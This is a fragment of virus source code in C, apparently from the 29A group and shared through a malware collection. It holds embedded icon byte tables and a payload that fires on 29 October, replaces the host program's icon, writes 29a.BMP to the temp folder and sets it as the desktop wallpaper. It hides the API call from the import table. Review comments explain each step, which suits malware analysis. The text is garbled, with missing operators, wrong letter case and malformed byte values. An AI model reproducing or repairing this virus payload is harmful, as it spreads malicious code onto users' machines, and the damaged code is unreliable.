0x55, 0xcc, 0x83, 0x60, 0xa6, 0x57, 0xc8, 0xF6, 0x8a, 0x72, 0xff, 0xE5, 0xD1,

0xB9, 0X14, 0X33, 0X7D, 0XE1, 0XA4, 0X53, 0XC0, 0X9B, 0X50, 0XBB, 0X10, 0X3B,

0x6D, 0xC1, 0XE4, 0XAE, 0XDA, 0x11, 0X41, 0XE1, 0X1A, 0X42, 0X9D, 0x1A, 0XB3,

0x00, 0x54, 0x32, 0x51, 0x17, 0x08, 0x/9, 0xE5, 0X50, 0X49, 0X6E, 0x4C, 0x0C,

0x9f, 0x26, 0x16, 0xcb, 0x16, 0xEA, 0xB6, 0XA9, 0X91, 0XCC, 0XB3, 0X63, 0XED,

0xF9, 0X2C, 0XA1, 0X2C, 0x10, 0X75, 0X06, 0X60, 0X2, 0X51, 0X0, 0X01, 0XCF,

0xDA, 0xAE, 0xF1, 0X14, 0x97, 0XA3, 0X32, 0X1C, 0X7E, 0x8E, 0xCA, 0x90, 0x2b,

0x4e, 0x4a, 0x6c, 0x82,0x91,0x67,0xed, 0x96,0x67,0xca, 0xef, 0x05, 0x07,

0x3b, 0xB6, 0x1e, 0x87, 0xFb, 0x2f, 0x06, 0x08, 0x85, 0x16, 0x2f, 0xca, 0x3f, 0x83, 0x9e, 0x59, 0x11, 0xfd, 0x97, 0x46, 0xc9, 0x31, 0x9b,

0x97, 0x95, 0x37, 0x07, 0x02, 0x6f, 0xc5, 0x2b, 0xCE, 0xF7, 0x95, 0x31, 0x1a,

0x82, 0x72, 0xDF, 0xD8, 0X4C, 0x3e, 0x68, 0x9, 0x1f, 0x83, 0x9d, 0x6e, 0xDE,

0xA7, 0X55, 0X9, 0X04, 0X93, 0X40, 0XE6, 0X2A, 0XCF, 0X67, 0X16, 0X37, 0X75,

0xF1, 0x04, 0xD5, 0XC7, 0X55, 0x0C, 0XBE, 0x9A, 0X27, 0XC5, 0X6C, 0X43, 0XE0,

0xB5, 0X2A, 0x31, 0x02, 0X1F, 0x24, 0x2B, 0xB2, 0X9C, 0x5C, 0XA3, 0X5D, 0XA0,

0x8b, 0x53, 0xbc, 0x1b, 0x5d, 0x1f, 0x55, 0xcc, 0xfe, 0xe7, 0xD5, 0xcc, 0xfe,

0xE7, 0xD5, 0XCC, 0xFE, 0xE7, 0XA8, 0X36, 0X77, 0X88, 0X96, 0X03, 0X2, 0X6C,

0x3a, 0x54, 0xAF, 0x5F, 0x9D, 0xAF, 0x8E, 0xC8, 0x0c, 0xc4, 0x29,

0xA7, 0x0f, 0x77, 0x1b, 0x4f, 0xba, 0xD0, 0xB2, 0x6c, 0xAF, 0xE3, 0XAA, 0X26,

0x58, 0x20, 0x00, 0x5b, 0xF3, 0x76, 0xF2, 0x2c, 0xB3, 0X59, 0XD4, 0XA1, 0X50,

0x18, 0x48, 0x00, 0x6b, 0x2d, 0x79, 0xee, 0xc0, 0x04, 0x44, 0xE2, 0x2, 0x59

}

#define sizeof_compr_icons sizeof (jq29acompricons)

#ELSE

BYTE JQ29AICONS [] = {

0x28, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x01,

0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x80, 0x00, 0x00,

0x00, 0x80, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80,

0x80, 0x00, 0x00, 0xc0, 0xc0, 0xc0, 0x00, 0x80, 0x80, 0x80, 0x00, 0x00, 0x00,

0xFF, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0x00,

0x00, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0X78, 0XE3, 0xF8,

0x00, 0x70, 0x63, 0xF8, 0x8f, 0xE3, 0x31, 0xF1, 0x87, 0xE3, 0x31, 0xf1, 0xc3,

0xFF, 0x10, 0x01, 0xC1, 0xFF, 0x18, 0x03, 0xE1, 0xF8, 0X18, 0XE3, 0XF0, 0XF0,

0x18, 0xE3, 0xF8, 0xE3, 0x1c, 0xE7, 0xF8, 0x63, 0x1c, 0x47, 0xFc, 0x63, 0x1c,

0x47, 0xFc, 0x63, 0x1c, 0x47, 0x1c, 0x63, 0x1e, 0x0f, 0x1c, 0x63, 0x3e, 0x0f,

0x80, 0xf0, 0x3e, 0x0f, 0xc1, 0xF8, 0x7f, 0x1f, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,

0xFF, 0xFF, 0x7F, 0xF0, 0XF3, 0XC0, 0X27, 0XF0, 0X73, 0X80, 0XE7, 0XE7, 0X3F,

0x98, 0xff, 0x32, 0x7f, 0xff, 0x3f, 0x3e, 0x7f, 0xff, 0x3f, 0x3e,

0x7f, 0xf, 0x3f, 0x3e, 0x7f, 0xf, 0x3f, 0x3e, 0x7f, 0xf, 0x3f, 0x3e, 0x7f,

0xFF, 0x3F, 0x9C, 0xFF, 0xFF, 0x3F, 0x80, 0xFF, 0xFF, 0x3F, 0xC1, 0xFF, 0xFF,

0xFF, 0xFF, 0xFF, 0x28, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x20, 0x00,

0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00,

0x80, 0x00, 0x00, 0x00, 0x80, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x80, 0x00,

0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0xc0, 0xc0, 0xc0, 0x00, 0x80, 0x80, 0x80,

0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xFF,

0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x0c, 0x000, 0x00, 0x00, 0x7b, 0x5d, 0x80, 0x00, 0xbf, 0x63, 0x00, 0x00,

0xDC, 0x6b, 0x80, 0x00, 0xeb, 0x6b, 0x00, 0x00, 0x6b, 0x6b, 0x80, 0x00, 0x9c,

0xF7, 0x00, 0x00, 0xFF, 0xFF, 0xc0, 0x00, 0xFF, 0xF3, 0x80, 0x00, 0xcd, 0x85,

0xFF, 0x00, 0xB7, 0x67, 0x00, 0x00, 0xF6, 0xD7, 0xFF, 0x00, 0xF6, 0xF7, 0x00,

0x00, 0xF7, 0x6f, 0xFF, 0x00, 0xF7, 0x9f, 0x00, 0x00, 0xff, 0xff, 0xfb, 0x00

}

#ENDIF

??????????????????????????????????????????? ?????????????? [jq29aico.h]??

??????????????????????????????????????????? ??????????????? [payload.c]??

// Payload fragment: a bare brace block whose enclosing function is not part
// of this listing.
//
// What the visible code does:
//   1. Reads the local time and acts only when the day is 29 and the month
//      is 0xA (October).
//   2. Sets BPAYLOADDAY and fills the HostLargeicon buffer with the embedded
//      icon data (decoded from the compressed table when `compr` is defined,
//      copied byte by byte otherwise).
//   3. In the `compr` build only: builds a bitmap from that icon, writes it
//      to a file under the temp path and sets it as the desktop wallpaper.
//
// NOTE(review): identifier case and several operators ('+', '++', '+=') were
// lost when the page was extracted, so the text does not compile as shown
// and some operands cannot be read reliably.
{

SystemTime SystemTime;

GetLocalTime (& SystemTime);

// Date trigger: local clock only, so it follows whatever the host clock says.
IF ((byte) systemtime.wday == 29 && (byte) systemtime.wmonth == 0xA) {

BPAYLOADDAY = TRUE;

#ifdef compr

// Decode the compressed icon table into the host icon buffer. The operators
// between the operands are missing in this copy, so the exact pointers
// passed cannot be determined from the listing.
JQ_DECode (Hostlargeicon Sizeof_icons,

JQ29acompricons sizeof_compr_icons,

SizeOf_compr_icons,

Comprmem);

{

Handle HBMP;

DWORD CBYTES;

// Build the output path in Pathname: temp path (call garbled in this copy),
// a trailing separator if missing, then two 4-byte character constants.
// NOTE(review): with little-endian storage of multi-character constants the
// two stores below presumably spell the file name "29a.BMP"; a file of that
// name in the temp directory is then a host artefact of this payload -
// confirm against an undamaged copy before relying on it.
IF ((CBytes = getTemppath) - 1

IF (Pathname [CBYTES - 1]! = '//') Pathname [CBYTES ] = '//';

* (PDWORD) (Pathname CBYTES) = '.a92';

* (PDWORD) (Pathname CBYTES 4) = 'PMB';

// Open or create the file for writing with no sharing.
HBMP = CREATEFILE (Pathname, Generic_Write, 0, NULL, OPEN_ALWAYS,

FILE_ATTRIBUTE_NORMAL, 0);

// The `Else` below pairs with the inner size check, not with the handle
// check: when the file cannot be opened nothing further happens.
IF (HBMP! = Invalid_Handle_Value)

// A file that already has the expected size is treated as already written;
// the bitmap is not regenerated and control jumps to the wallpaper step.
IF (GetFileSize (hbmp, null) == sizeof_bmp) {

CloseHandle (HBMP);

Goto setDeskwallpaper;

}

Else {

{

PBYTE PSRC = HostLargeicon;

PBYTE PTGT = JQ29ABMP 0XE;

// 0x68 bytes are copied from the icon image; presumably the 0x28-byte DIB
// header plus a 16-entry colour table (0x40 bytes).
DWORD NCOUNT = 0x68;

// First four bytes of the output buffer: 42 4D 76 80, i.e. the "BM" bitmap
// signature followed by the low bytes of the file-size field.
* (PDWORD) (PTGT - 0xE) = 0x80764d42;

// Byte at file offset 0xA (pixel-data offset field) set to 0x76.
PTGT [0xA - 0xE] = 0x76;

Do * ptgt = * psrc ; while (--ncount);

// Patch the copied DIB header: 0x100 x 0x100 pixels, plus image-size and
// resolution fields.
(PbitmapInfoHead) (PTGT - 0x68)) -> BiWidth = 0x100;

(PbitmapInfoHeader) (PTGT - 0x68)) -> Biheight = 0x100;

* (PBITE) & (PbitmapInfoHead) -> BisizeImage 1)

= 0x80;

* (PWORD) & (PbitmapInfoHead) (PTGT - 0x68)) -> Bixpelspermeter

= 0xecE;

* (PWORD) & (PbitmapInfoHead) (PTGT - 0x68)) -> Biypelspermeter

= 0xed8;

// NOTE(review): presumably "PSRC += 0x200", stepping past 0x200 bytes of
// icon pixel data to the 1-bit mask that follows - confirm.
PSRC = 0x200;

{

// Expand the mask: 32 source dwords, each bit written out as a run of
// bytes valued 0x66 or 0, with the nested loops repeating rows and columns.
DWORD NCOUNTDWORDS = 32;

Do {

DWORD NCOUNTYPELS = 8;

DWORD PIX = * (PDWORD) PSRC) ;

// Byte-swap the 32-bit value (swap low bytes, rotate 16, swap again) so the
// bits can be consumed from the top bit downwards.
__ASM {

MOV EAX, [PIX]

XCHG AH, Al

ROL EAX, 16

XCHG AH, Al

MOV [PIX], EAX

}

Do {

DWORD PIXCOPY = PIX;

DWORD NCOUNTBITS = 32;

Do {

DWORD NCOUNTXPELS = 4;

Do {

* PTGT = (PIXCOPY & 0x80000000)? 0x66: 0;

} while (--ncountxpels); pixcopy << = 1;

WHILE (--NCOUNTBITS);

While (--NCOUNTYPELS);

WHILE (--NCOUNTDWORDS);

}

}

{

// Write the finished bitmap; only the result of this first write is kept.
Bool Bbool = Writefile (HBMP, JQ29ABMP, SizeOf_BMP, & CBYTES,

NULL);

// Zero-length write; its purpose is not evident from the listing
// (presumably it fixes the file length at the current position - confirm).
Writefile (HBMP, JQ29ABMP, 0, & CBytes, NULL);

CloseHandle (HBMP);

IF (bbool) {

// The label below is also the target of the "file already present" jump.
Hinstance hinst; setdeskwallpaper:

// User32 is loaded and the function address resolved at run time instead of
// through the import table, so a review of the import table alone does not
// show this call.
Hinst = loadingLibrary ("User32");

IF (hinst) {

DWORD (WinApi * PfnsystemParametersInfo) (DWORD, DWORD,

PVOID, DWORD;

PfnsystemParametersInfo =

(DWORD (WinApi *) (DWORD, DWORD, PVOID, DWORD)

GetProcadDress (Hinst, "SystemParametersInfoa);

// Sets the desktop wallpaper to the file written above. The update-ini-file
// flag asks for the setting to be stored in the user profile, so the change
// outlives the trigger date and has to be reset during clean-up.
IF (PFNSYSTEMPARETERSINFO)

PfnsystemParametersInfo (SPI_SETDESKWALLPAPER,

0,

Pathname,

Spif_updateinifile;

Freelibrary (HINST);

}

}

}

}

}

}

#ELSE

{

// Uncompressed build: plain byte copy of the embedded icon table over the
// host icon buffer; no file is written and no wallpaper is set here.
PBYTE PTGT = HostLargeicon;

PBYTE PSRC = JQ29AICONS;

DWORD NCOUNT = SIZEOF_ICONS;

Do * ptgt = * psrc while (--ncount);

}

#ENDIF

}

}

??????????????????????????????????????????? ??????????????? [payload.c]??

Chaght to you by 'the zoo'!
